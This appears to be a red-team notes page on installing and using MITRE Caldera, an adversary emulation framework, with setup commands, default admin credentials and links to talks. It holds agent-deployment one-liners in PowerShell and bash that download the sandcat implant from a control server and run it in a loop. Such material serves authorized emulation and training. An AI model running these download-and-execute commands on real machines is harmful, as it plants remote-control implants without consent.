Caldera

Install Caldera

Ensure Docker is installed first. Run as root

cd /opt
sudo git clone https://github.com/mitre/caldera.git --recursive
cd caldera
sudo ./install.sh --kali

Run Caldera

cd /opt/caldera
source calderaenv/bin/activate
python server.py

http://127.0.0.1:8888
admin:admin

Deploy Agent

Windows

$url="http://192.168.120.135:8888/file/download"; $wc=New-Object System.Net.WebClient;$wc.Headers.add("platform","windows"); $wc.Headers.add("file","sandcat.go"); $output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output); C:\Users\Public\sandcat.exe -server http://192.168.120.135:8888 -group my_group;
OR
while($true) {$url="http://192.168.120.135:443/file/download";$wc=New-Object System.Net.WebClient;$wc.Headers.add("file","sandcat.exe");$output="C:\Users\Public\sandcat.exe";$wc.DownloadFile($url,$output);C:\Users\Public\sandcat.exe http://192.168.120.135:443 my_group; sleep 60}

Linux

while true; do curl -sk -X POST -H 'file:sandcat-linux' http://localhost:8888/file/download > /tmp/sandcat-linux && chmod +x /tmp/sandcat-linux && /tmp/sandcat-linux http://localhost:8888 my_group; sleep 60; done

Understanding Caldera

This graphic created by Adam Mashinchi

Presentation from Erik van Buggenhout: https://www.slideshare.net/erikvanbuggenhout/adversary-emulation-using-caldera

Caldera YouTube Playlist: https://www.youtube.com/playlist?list=PLkTApXQou_8KFTzR7KqDJh-ndMO39PYnB

PreviousResources NextCovenant

Last updated 4 years ago